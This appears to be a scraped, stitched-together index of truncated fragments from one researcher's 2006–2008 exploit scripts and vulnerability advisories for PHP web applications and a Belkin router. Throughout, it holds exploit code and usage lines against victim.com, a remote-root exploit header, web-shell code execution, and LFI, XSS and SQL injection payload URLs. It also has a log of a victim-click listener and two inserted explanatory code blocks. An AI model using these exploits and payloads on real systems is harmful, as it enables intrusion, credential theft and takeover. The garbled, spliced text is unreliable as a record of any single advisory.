{
if( $exit )
usage();
return true;
}
}
}
if( $exit )
usage();
Update: Versions 2.2.x are also affected by the SQL Injection issue. A patch is
available from http://forums.invisionpower.com/index.php?showtopic=276512. They
only corrected the SQL Injection vulnerability. All versions are still affected
by the other issues.
Several changes were made.
* IDS Evasion feature added (%0D)
* You need the phpsploit class version >= 2.1
The newest version is available from:
http://acid-root.new.fr/?1:35
D
ASCII(SUBSTR('.$this->t_field.
','.$this->sub_chr.',1))='.$asc.'
'.$this->t_add_0;
}
else
{
Title: Invision Power Board <= 2.3.5
Multiple Vulnerabilities and Security Bypass
Vendor: http://www.invisionpower.com/community/board/
Advisory: http://acid-root.new.fr/?0:18
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Re
#!/usr/bin/php -q
http://localhost/vhcs2/
#
# VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
# --
#
# About:
# by DarkFig < gmdarkfig (at) gmail (dot) com >
# http://acid-root.new.fr/
# [EMAIL PROTECTED]
#
##
## VULNERABILITY:
##
## Belkin Wireless G Plus MIMO Router F5D9230-4
## Authentication Bypass Vulnerability
##
##
## AUTHOR:
##
## DarkFig < gmdarkfig (at) gmail (dot) com >
## http://acid-root.new.fr/?0:17
## [EMAIL PROTECTED]
##
##
## INTRODUCTION:
##
## I re
Title: PHP Security Framework (Beta 1)
Multiple Vulnerabilities and Security Bypass
Vendor: http://benjilenoob.66ghz.com/projects/
Advisory: http://acid-root.new.fr/?0:16
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on:
#!/usr/bin/php
agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url.'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc
Title: Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
Vendor: http://sourceforge.net/projects/sphpblog/
Advisory: http://acid-root.new.fr/?0:15
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2007/10/21
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5125
Same as mine:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1171
[me]
# +nsbypass.php
# 16. $tid = intval($tid);
# 17. if(isset($_COOKIE['admin']) && !empty($_COOKIE['admin'])) {
# 18. $abadmin = base64_decode($_COOKIE['admin']);
# 19. $abadmin = ex
sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.
You're all right. I added your replies to the advisory (if you want me to
withdraw them, feel free to contact me).
Title:PHP parse_str() arbitrary variable overwrite
Vendor:http://www.php.net/
Advisory:http://www.acid-root.new.fr/advisories/14070612.txt
Author:DarkFig < gmdarkfig (at) gmail (dot) com >
Written on:2007/06/12
Released on:2007/06/12
Risk
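The primitive behind the parse_str() advisory, as an added example that is not part of the advisory or of PHP's documentation: the one-argument form imports every key of the query string into the calling scope, so a user-controlled key overwrites whatever the script already defined, regardless of php.ini. The variable names ($is_admin, $params) and the query string are assumptions for the demo. On PHP 5.x and 7.x, vulnerable() returns true and hardened() returns false for the same input; PHP 7.2 deprecated the one-argument call and PHP 8.0 removed it (it raises ArgumentCountError), which is the definitive fix.

```php
<?php
// Added example (not from the advisory): the primitive behind "parse_str()
// arbitrary variable overwrite", beside the form that avoids it. The variable
// names ($is_admin, $params) and the query strings are assumptions for the demo.

// Vulnerable: with a single argument, parse_str() imports every key of the
// string as a variable in the calling scope, exactly like register_globals=On,
// and regardless of php.ini. Anything the script already relied on can be
// clobbered by a user-controlled key. (Deprecated in PHP 7.2, removed in 8.0,
// so on PHP 8 this function throws ArgumentCountError instead.)
function vulnerable(string $query): bool {
    $is_admin = false;                 // trusted default ...
    parse_str($query);                 // ... overwritten by "is_admin=1"
    return (bool) $is_admin;
}

// Hardened: parse into a dedicated array and read only the keys you expect
// from it. Nothing outside $params changes, whatever the query string holds.
function hardened(string $query): bool {
    $is_admin = false;
    parse_str($query, $params);
    $page = isset($params['page']) ? (int) $params['page'] : 1;  // expected key
    return (bool) $is_admin;           // untouched by the query string
}

$q = 'page=1&is_admin=1';              // constructed attacker-controlled input
var_dump(vulnerable($q));
var_dump(hardened($q));
```

The same primitive reaches further than a single flag: keys such as `_GET[x]` or `_SERVER[REMOTE_ADDR]` become array writes into the superglobals when imported this way, so any script that calls parse_str() on user input with one argument should be treated as running with register_globals enabled for that request.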
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
require("phpsploitclass.php"); # If you want to use this class, the latest
# version can
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
---
Usage: $argv[0] -url <> -usr <> -pwd <> [Options]
Params: -url For example http://victim.com/punBB/
-usr User account (1 post at least)
Title:PunBB <= 1.2.14 Multiple Vulnerabilities
Author:DarkFig < gmdarkfig (at) gmail (dot) com >
Written on:2007/04/08
Released on:2007/04/11
Risk level:High
URL:http://www.acid-root.new.fr/advisories/13070411.txt
Summary:SQL
#!/usr/bin/php
http://www.milw0rm.com/exploits/2012
# They corrected (though not all of them) many of the SQL queries that use the
# IP address, with $db->escape_string.
# They did not correct the function itself (a choice, and the wrong one), and
# they forgot to correct one (just one) SQL query.
# They must correct the proble
#!/usr/bin/php
http://www.acid-root.new.fr \/ [EMAIL PROTECTED]
NOTE | Works regardless of php settings
USAGE | $argv[0] -url [Options]
OPTIONS | -proxy If you wanna use a proxy
| -proxyauth Basic authentication
");exit(1);
}
$url = getparam('url',1);
$pro = getparam('proxy'
#!/usr/bin/php
= 4.0.24) Exploit ---
---
PHP conditions: none
CMS conditions: disable_switch<=0 (module activated), track_active=1
Credits: DarkFig <[EMAIL PROTECTED]>
URL: http://www.acid-root.new.fr/
--
#!/usr/bin/php
http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
-- webSPELL <= 4.01.02 Remote PHP Code Execution Exploit --
---
PHP conditions: register_globals=On
Credits: Dark
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
---
Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
Params: -url For example http://victim.com/connectix/
-usr The username of your accoun
#!/usr/bin/php
URL: http://www.acid-root.new.fr/
Support us: Just click once on our ad ;)
--
Usage: $argv[0] -url -victim [Opts]
Options: -isadmin Is the victim an Admin (1) or a normal user (default=0) ?
#!/usr/bin/php
File Disclosure
# Maybe work on other versions.
# Interesting exploit =)
#
if($argc < 5) {
print("
NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit
--
PHP conditions: none
CMS conditions: disable_switch<
Small error in the file upload vulnerability.
Updated, see http://www.acid-root.new.fr/advisories/12070214.txt.
Sorry for the inconvenience :(.
"An attacker can access this script simply by sending a request that does not
contain the "is_guest" and "is_user" variables."
Title:Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID:12070214
Risk level:High
Author:DarkFig <[EMAIL PROTECTED]>
URL:http://www.acid-root.new.fr/advisories/12070214.txt
.: [ OVERVIEW ]
Jupiter CMS 1.1.5 is a powerful user-friendly Community
This is not an SQL Injection. The script doesn't use any SQL database; please
tell me where the SQL request is =). However, the install.php script can lead to
PHP code execution (works regardless of php.ini settings). Proof of concept:
-
#!/usr/bin/php
$cod = "print(poc)";
$xpl = new phpsploit
#!/usr/bin/php
= 1.2
error_reporting(E_ALL ^ E_NOTICE);
/*
header> Aztek Forum 4.1 Multiple Vulnerabilities Exploit
header> ===
sploit> Owner -> root
status> Trying to register a new user
sploit> Login/Password -> phpsploit8435
status> Trying t
Small error: the latest version is 4.00.
Updated, sorry for the inconvenience.
#!/usr/bin/php
@lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header>
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> D
#!/usr/bin/php
";
print "\nProxyOptions..: ";
print "\nExample...: php xpl.php http://c.com/ admin passwd";
print "\n-\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2]
#!/usr/bin/php
Options...:
Example...: php xpl.txt http://hihi.org/ /etc/passwd
\n");
exit(1);
}
$url =$argv[1];$file =$argv[2];
$proxh=$argv[3];$proxa=$argv[4];
$xpl = new phpsploit();
$xpl->agent("Mozilla");
if($proxh) $xp
'Administrateur') { header("Location:
../index.php");}
;} else { header("Location: ../index.php");}?>
...
*/
if(!isset($_GET['host']) || empty($_GET['host'])) headers();
if(!isset($_GET['wanted'])) $wanted = 'index.php';
$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];
e
#!/usr/bin/perl
#
# INFORMATIONS
#
# Affected.scr..: Ixprim 1.2
# Poc.ID: 16061221
# Type..: Blind SQL Injection
# Risk.level: Medium
# Conditions: load_file privilege (ixp code only)
# Src.download..: www.ixprim-cms.org
# Poc.link..: acid-root.new.fr/poc/16
#!/usr/bin/perl
#
#
# INFORMATIONS
#
# Affected.scr..: Cahier de texte V2.0
# Poc.ID: 15061124
# Type..: Predictable backup filename, Source disclosure
# Risk.level: High
# Conditions: register_globals = on
# Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_d
Already posted here http://s-a-p.ca/index.php?page=OurAdvisories&id=27
Already posted here (2006-11-14 17:10:35)
http://s-a-p.ca/index.php?page=OurAdvisories&id=31.
Stop copying them!!
#!/usr/bin/php
---\n");
exit(1);
}
print "\n Please be patient (max=736 hits)...\n MD5: ";
$host = !preg_match("/^http:\/\/(\S*)/",$argv[1],$hwttp) ? $argv[1] : $hwttp[1];
$path = $argv[2];
$usid = intval($argv[3]);
$tabl = "o2_members";
fo
#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in
#!/usr/bin/perl
#
# Affected.scr..: Blog Pixel Motion V2.1.1
# Poc.ID: 12060927
# Type..: PHP Code Execution (stripslashes), SQL Injection (urldecode)
# Risk.level: High
# Vendor.Status.: Unpatched
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip
# Poc.link..: a
Sorry for the small error: *Unpatched.
Just imagine you have limited access to an SQL injection (SQL commands are
filtered, for example) and you don't know the source code of the PHP script. You
can't do anything with the SQL injection; all your attempts lead to an error
returned to the client.
esponse from PHP Team.
==[ TIMELINE
06. Sept. 2006 - Vendor contacted
20. Sept. 2006 - Public disclosure
==[ CONTACT
===
Author: DarkFig
Web...: www.acid-root.new.fr
E-mail: gmdarkfig[*]gmail[*]com (fr/en)
Note: Tested on 4.4.3
#!/usr/bin/perl
#
# Affected.scr..: SoftBB 0.1
# Poc.ID: 11060904
# Type..: PHP code execution, SQL Injection, Full Path Disclosure
# Risk.level: High
# Vendor.Status.: Unpatched
# Src.download..: softbb.be
# Poc.link..: acid-root.new.fr/poc/11060904.txt
# Advisory.
#!/usr/bin/perl
#
# Affected.scr..: Tr Forum V2.0
# Poc.ID: 10060903
# Type..: SQL Injection, Bypass Security Restriction
# Risk.level: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.tr-forum.1579.html
# Poc.link..: acid-root.new.fr/p
#!/usr/bin/perl
#
# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID: 09060902.txt
# Type..: SQL Injection (without quote)
# Risk.level: Medium
# Vendor.Status.: Unpatched
# Src.download..: http://www.1two.org/
# Poc.link..: acid-root.new.fr/poc/09060902.txt
# Credits
#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID: 08060901
# Type..: Members' passwords are stored in a .dat file not protected by a
# .htaccess file
# Risk.level: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.
verified.
==[ TIMELINE
29. Aug. 2006 - Public Disclosure
==[ CONTACT
===
Author: DarkFig
Web...: www.acid-root.new.fr
E-mail: gmdarkfig[*]gmail[*]com (fr/en)
#
# VulnScr: ezContents Version 2.0.3
# Web: http://www.ezcontents.org/
#
# Date...: Web July 28 10:44 2006
# Credits: DarkFig ([EMAIL PROTECTED])
# Vuln...: SQL Injection, Remote/Local File Inclusion, Cross Site Scripting
#
==[ Remote / Local File Inclusion
==
#!/usr/bin/perl
#
# VulnScr: boastMachine version 3.1 and prior
# Web: http://boastology.com/
#
# Date: Sun July 16 10:43 PM 2006
# Credits: DarkFig ([EMAIL PROTECTED])
# Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery,
Predictable Backup Filename
#
# Title: 5 php scripts remote database password disclosure
# Date: Sun July 02 21:04 2006
# Credits: Security hole discovered by DarkFig ([EMAIL PROTECTED])
# Problem: Database configuration is located in a .inc file (not protected by a
# .htaccess file)
# Web: http://acid-root
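The access rule both of these findings are missing (the µforum .dat password store above and the .inc database configuration here), as an added configuration example that is not part of either advisory or of the affected scripts. The directory and file names (inc/config.inc, data/users.dat) are assumptions for illustration.

```apache
# Added example, not from either advisory: the missing access rule. Paths and
# filenames (inc/config.inc, data/users.dat) are assumptions for illustration.

# Weak: no rule at all, so GET /inc/config.inc and GET /data/users.dat are
# served as plain text, database credentials and password file included.

# Corrected (Apache 2.4 syntax), in the vhost config or a .htaccess at the
# document root; on Apache 2.2 use "Order allow,deny" and "Deny from all" instead:
<FilesMatch "\.(inc|dat)$">
    Require all denied
</FilesMatch>
```

The rule only works where .htaccess is honoured (AllowOverride) or where the vhost config is under your control, so the more robust fix is to keep such files outside the document root entirely, or to name includes `.inc.php` so the interpreter executes them rather than the server dumping their source.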
#!/usr/bin/perl
#
# VulnScr: SturGeoN Upload v1
# Author: Jihad BENABRA
# Download: http://rapidshare.de/files/24622338/2012_sturgeon-1.rar.html
# WTF?: http://www.comscripts.com/scripts/php.sturgeon-upload.2012.html
#
# Date: Sat July 1 10:04 2006
# Credits: Vuln and Xpl
#!/usr/bin/perl
#
# VulnScr: News version 5.2 and prior
# E-mail: [EMAIL PROTECTED]
# Web: www.vincent-leclercq.com
#
# Date: Thu June 29 12:01 2006
# Credits: DarkFig ([EMAIL PROTECTED])
# Vuln: XSS, Full Path Disclosure, SQL Injection
# Advisory: http://www.acid-r
#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full
# Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;
# Header
print "\r\n+---
PhpMyFactures 1.0
*
Full Path Disclosure
[Guest] http://[...]/verif.php
[Guest] http://[...]/inc/footer.php
[Guest] http://[...]/remises/ajouter_remise.php
Information modification
*
[Guest] http://[...]/tva/ajouter_tva.
Cross Site Scripting
http://[...]/read.php?msg_result=[XSS]
http://[...]/read.php?rep_titre=";>[XSS]
Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS]
SQL Injection
*
http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
http://[..
// Script
Web www.npds.org
versions --- NPDS <= 5.10
Solutions -- None official
Note --- Vendor has been contacted
// Local Inclusion
http://[...]/header.php?Default_Theme=../apache/logs/error.log%00
http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../../apa
#!/usr/bin/perl
#
# by DarkFig -- www.acid-root.new.fr
#
use LWP::Simple;
if ( !$ARGV[1] ) {
header();
print "\n| Usage: |";
print "\n+--+";
print "\n| Example: http://localhost/dmx/ 1 --|";
end();
}
sub header {
print "
Type: SQL Injection
Risk: Critical
Product: CoolForum <= 0.8.3 beta
Vulnerability
*
// File: editpost.php
// Line 38
//
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);
else $post = 0;
--
// Line 77
//
$canedit = getrighted